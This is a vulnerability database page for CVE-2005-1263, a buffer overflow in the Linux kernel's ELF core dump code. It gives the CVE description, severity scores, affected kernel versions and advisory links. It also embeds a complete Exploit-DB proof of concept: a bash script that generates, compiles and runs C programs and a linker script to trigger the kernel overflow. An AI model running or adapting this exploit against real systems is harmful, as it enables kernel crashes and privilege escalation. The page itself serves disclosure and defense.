CVE-2005-1263 : Detail

CVE-2005-1263

0.06%V4
Local
2005-05-11
02h00 +00:00
2018-10-19
12h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The elf_core_dump function in binfmt_elf.c for Linux kernel 2.x.x to 2.2.27-rc2, 2.4.x to 2.4.31-pre1, and 2.6.x to 2.6.12-rc4 allows local users to execute arbitrary code via an ELF binary that, in certain conditions involving the create_elf_tables function, causes a negative length argument to pass a signed integer comparison, leading to a buffer overflow.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 25647

Publication date : 2005-05-10 22h00 +00:00
Author : Paul Starzetz
EDB Verified : Yes

/* source: https://www.securityfocus.com/bid/13589/info The Linux kernel is susceptible to a local buffer-overflow vulnerability when attempting to create ELF coredumps. This issue is due to an integer-overflow flaw that results in a kernel buffer overflow during a 'copy_from_user()' call. To exploit this vulnerability, a malicious user creates a malicious ELF executable designed to create a negative 'len' variable in 'elf_core_dump()'. Local users may exploit this vulnerability to execute arbitrary machine code in the context of the kernel, facilitating privilege escalation. **Update: This vulnerability does not exist in the 2.6 kernel tree. */ #!/bin/bash # # elfcd.sh # warning: This code will crash your machine # cat <<__EOF__>elfcd1.c /* * Linux binfmt_elf core dump buffer overflow * * Copyright (c) 2005 iSEC Security Research. All Rights Reserved. * * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS" * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. * */ // phase 1 #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <unistd.h> #include <sys/time.h> #include <sys/resource.h> #include <asm/page.h> static char *env[10], *argv[4]; static char page[PAGE_SIZE]; static char buf[PAGE_SIZE]; void fatal(const char *msg) { if(!errno) { fprintf(stderr, "\nFATAL: %s\n", msg); } else { printf("\n"); perror(msg); } fflush(stdout); fflush(stderr); _exit(129); } int main(int ac, char **av) { int esp, i, r; struct rlimit rl; __asm__("movl %%esp, %0" : : "m"(esp)); printf("\n[+] %s argv_start=%p argv_end=%p ESP: 0x%x", av[0], av[0], av[ac-1]+strlen(av[ac-1]), esp); rl.rlim_cur = RLIM_INFINITY; rl.rlim_max = RLIM_INFINITY; r = setrlimit(RLIMIT_CORE, &rl); if(r) fatal("setrlimit"); memset(env, 0, sizeof(env) ); memset(argv, 0, sizeof(argv) ); memset(page, 'A', sizeof(page) ); page[PAGE_SIZE-1]=0; // move up env & exec phase 2 if(!strcmp(av[0], "AAAA")) { printf("\n[+] phase 2, <RET> to crash "); fflush(stdout); argv[0] = "elfcd2"; argv[1] = page; // term 0 counts! memset(buf, 0, sizeof(buf) ); for(i=0; i<789 + 4; i++) buf[i] = 'C'; argv[2] = buf; execve(argv[0], argv, env); _exit(127); } // move down env & reexec for(i=0; i<9; i++) env[i] = page; argv[0] = "AAAA"; printf("\n[+] phase 1"); fflush(stdout); execve(av[0], argv, env); return 0; } __EOF__ cat <<__EOF__>elfcd2.c // phase 2 #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <syscall.h> #include <sys/syscall.h> #include <asm/page.h> #define __NR_sys_read __NR_read #define __NR_sys_kill __NR_kill #define __NR_sys_getpid __NR_getpid char stack[4096 * 6]; static int errno; inline _syscall3(int, sys_read, int, a, void*, b, int, l); inline _syscall2(int, sys_kill, int, c, int, a); inline _syscall0(int, sys_getpid); // yeah, lets do it void killme() { char c='a'; int pid; pid = sys_getpid(); for(;;) { sys_read(0, &c, 1); sys_kill(pid, 11); } } // safe stack stub __asm__( " nop \n" "_start: movl \$0xbfff6ffc, %esp \n" " jmp killme \n" ".global _start \n" ); __EOF__ cat <<__EOF__>elfcd.ld OUTPUT_FORMAT("elf32-i386", "elf32-i386", "elf32-i386") OUTPUT_ARCH(i386) ENTRY(_start) SEARCH_DIR(/lib); SEARCH_DIR(/usr/lib); SEARCH_DIR(/usr/local/lib); SEARCH_DIR(/usr/i486-suse-linux/lib); MEMORY { ram (rwxali) : ORIGIN = 0xbfff0000, LENGTH = 0x8000 rom (x) : ORIGIN = 0xbfff8000, LENGTH = 0x10000 } PHDRS { headers PT_PHDR PHDRS ; text PT_LOAD FILEHDR PHDRS ; fuckme PT_LOAD AT (0xbfff8000) FLAGS (0x00) ; } SECTIONS { .dupa 0xbfff8000 : AT (0xbfff8000) { LONG(0xdeadbeef); _bstart = . ; . += 0x7000; } >rom :fuckme . = 0xbfff0000 + SIZEOF_HEADERS; .text : { *(.text) } >ram :text .data : { *(.data) } >ram :text .bss : { *(.dynbss) *(.bss) *(.bss.*) *(.gnu.linkonce.b.*) *(COMMON) . = ALIGN(32 / 8); } >ram :text } __EOF__ # compile & run echo -n "[+] Compiling..." gcc -O2 -Wall elfcd1.c -o elfcd1 gcc -O2 -nostdlib elfcd2.c -o elfcd2 -Xlinker -T elfcd.ld -static ./elfcd1

Products Mentioned

Configuraton 0

Linux>>Linux_kernel >> Version 2.2.0

Linux>>Linux_kernel >> Version 2.2.1

Linux>>Linux_kernel >> Version 2.2.2

Linux>>Linux_kernel >> Version 2.2.3

Linux>>Linux_kernel >> Version 2.2.4

Linux>>Linux_kernel >> Version 2.2.5

Linux>>Linux_kernel >> Version 2.2.6

Linux>>Linux_kernel >> Version 2.2.7

Linux>>Linux_kernel >> Version 2.2.8

Linux>>Linux_kernel >> Version 2.2.9

Linux>>Linux_kernel >> Version 2.2.10

Linux>>Linux_kernel >> Version 2.2.11

Linux>>Linux_kernel >> Version 2.2.12

Linux>>Linux_kernel >> Version 2.2.13

Linux>>Linux_kernel >> Version 2.2.14

Linux>>Linux_kernel >> Version 2.2.15

Linux>>Linux_kernel >> Version 2.2.16

Linux>>Linux_kernel >> Version 2.2.17

Linux>>Linux_kernel >> Version 2.2.18

Linux>>Linux_kernel >> Version 2.2.19

Linux>>Linux_kernel >> Version 2.2.20

Linux>>Linux_kernel >> Version 2.2.21

Linux>>Linux_kernel >> Version 2.2.22

Linux>>Linux_kernel >> Version 2.2.23

Linux>>Linux_kernel >> Version 2.2.24

Linux>>Linux_kernel >> Version 2.2.27

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.0

Linux>>Linux_kernel >> Version 2.4.1

Linux>>Linux_kernel >> Version 2.4.2

Linux>>Linux_kernel >> Version 2.4.3

Linux>>Linux_kernel >> Version 2.4.4

Linux>>Linux_kernel >> Version 2.4.5

Linux>>Linux_kernel >> Version 2.4.6

Linux>>Linux_kernel >> Version 2.4.7

Linux>>Linux_kernel >> Version 2.4.8

Linux>>Linux_kernel >> Version 2.4.9

Linux>>Linux_kernel >> Version 2.4.10

Linux>>Linux_kernel >> Version 2.4.11

Linux>>Linux_kernel >> Version 2.4.12

Linux>>Linux_kernel >> Version 2.4.13

Linux>>Linux_kernel >> Version 2.4.14

Linux>>Linux_kernel >> Version 2.4.15

Linux>>Linux_kernel >> Version 2.4.16

Linux>>Linux_kernel >> Version 2.4.17

Linux>>Linux_kernel >> Version 2.4.18

Linux>>Linux_kernel >> Version 2.4.18

    Linux>>Linux_kernel >> Version 2.4.18

    Linux>>Linux_kernel >> Version 2.4.18

    Linux>>Linux_kernel >> Version 2.4.18

    Linux>>Linux_kernel >> Version 2.4.18

    Linux>>Linux_kernel >> Version 2.4.18

    Linux>>Linux_kernel >> Version 2.4.18

    Linux>>Linux_kernel >> Version 2.4.18

    Linux>>Linux_kernel >> Version 2.4.18

    Linux>>Linux_kernel >> Version 2.4.19

    Linux>>Linux_kernel >> Version 2.4.19

    Linux>>Linux_kernel >> Version 2.4.19

    Linux>>Linux_kernel >> Version 2.4.19

    Linux>>Linux_kernel >> Version 2.4.19

    Linux>>Linux_kernel >> Version 2.4.19

    Linux>>Linux_kernel >> Version 2.4.19

    Linux>>Linux_kernel >> Version 2.4.20

    Linux>>Linux_kernel >> Version 2.4.21

    Linux>>Linux_kernel >> Version 2.4.21

    Linux>>Linux_kernel >> Version 2.4.21

    Linux>>Linux_kernel >> Version 2.4.21

    Linux>>Linux_kernel >> Version 2.4.22

    Linux>>Linux_kernel >> Version 2.4.23

    Linux>>Linux_kernel >> Version 2.4.23

    Linux>>Linux_kernel >> Version 2.4.23_ow2

      Linux>>Linux_kernel >> Version 2.4.24

      Linux>>Linux_kernel >> Version 2.4.24_ow1

        Linux>>Linux_kernel >> Version 2.4.25

        Linux>>Linux_kernel >> Version 2.4.26

        Linux>>Linux_kernel >> Version 2.4.27

        Linux>>Linux_kernel >> Version 2.4.27

        Linux>>Linux_kernel >> Version 2.4.27

        Linux>>Linux_kernel >> Version 2.4.27

        Linux>>Linux_kernel >> Version 2.4.27

        Linux>>Linux_kernel >> Version 2.4.27

        Linux>>Linux_kernel >> Version 2.4.28

        Linux>>Linux_kernel >> Version 2.4.29

        Linux>>Linux_kernel >> Version 2.4.30

        Linux>>Linux_kernel >> Version 2.4.31

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.0

        Linux>>Linux_kernel >> Version 2.6.1

        Linux>>Linux_kernel >> Version 2.6.1

        Linux>>Linux_kernel >> Version 2.6.1

        Linux>>Linux_kernel >> Version 2.6.2

        Linux>>Linux_kernel >> Version 2.6.3

        Linux>>Linux_kernel >> Version 2.6.4

        Linux>>Linux_kernel >> Version 2.6.5

        Linux>>Linux_kernel >> Version 2.6.6

        Linux>>Linux_kernel >> Version 2.6.6

        Linux>>Linux_kernel >> Version 2.6.7

        Linux>>Linux_kernel >> Version 2.6.7

        Linux>>Linux_kernel >> Version 2.6.8

        Linux>>Linux_kernel >> Version 2.6.8

        Linux>>Linux_kernel >> Version 2.6.8

        Linux>>Linux_kernel >> Version 2.6.8

        Linux>>Linux_kernel >> Version 2.6.9

          Linux>>Linux_kernel >> Version 2.6.10

          Linux>>Linux_kernel >> Version 2.6.10

          Linux>>Linux_kernel >> Version 2.6.11

          Linux>>Linux_kernel >> Version 2.6.12

          Linux>>Linux_kernel >> Version 2.6_test9_cvs

            References

            http://www.vupen.com/english/advisories/2005/0524
            Tags : vdb-entry, x_refsource_VUPEN
            http://secunia.com/advisories/19185
            Tags : third-party-advisory, x_refsource_SECUNIA
            http://secunia.com/advisories/19607
            Tags : third-party-advisory, x_refsource_SECUNIA
            http://www.securityfocus.com/archive/1/428058/100/0/threaded
            Tags : vendor-advisory, x_refsource_FEDORA
            http://www.redhat.com/support/errata/RHSA-2005-472.html
            Tags : vendor-advisory, x_refsource_REDHAT
            http://www.securityfocus.com/bid/13589
            Tags : vdb-entry, x_refsource_BID
            http://www.securityfocus.com/archive/1/397966
            Tags : mailing-list, x_refsource_BUGTRAQ
            http://www.securityfocus.com/archive/1/428028/100/0/threaded
            Tags : vendor-advisory, x_refsource_FEDORA
            http://www.redhat.com/support/errata/RHSA-2005-551.html
            Tags : vendor-advisory, x_refsource_REDHAT
            http://www.redhat.com/support/errata/RHSA-2005-529.html
            Tags : vendor-advisory, x_refsource_REDHAT
            http://www.securityfocus.com/archive/1/427980/100/0/threaded
            Tags : vendor-advisory, x_refsource_FEDORA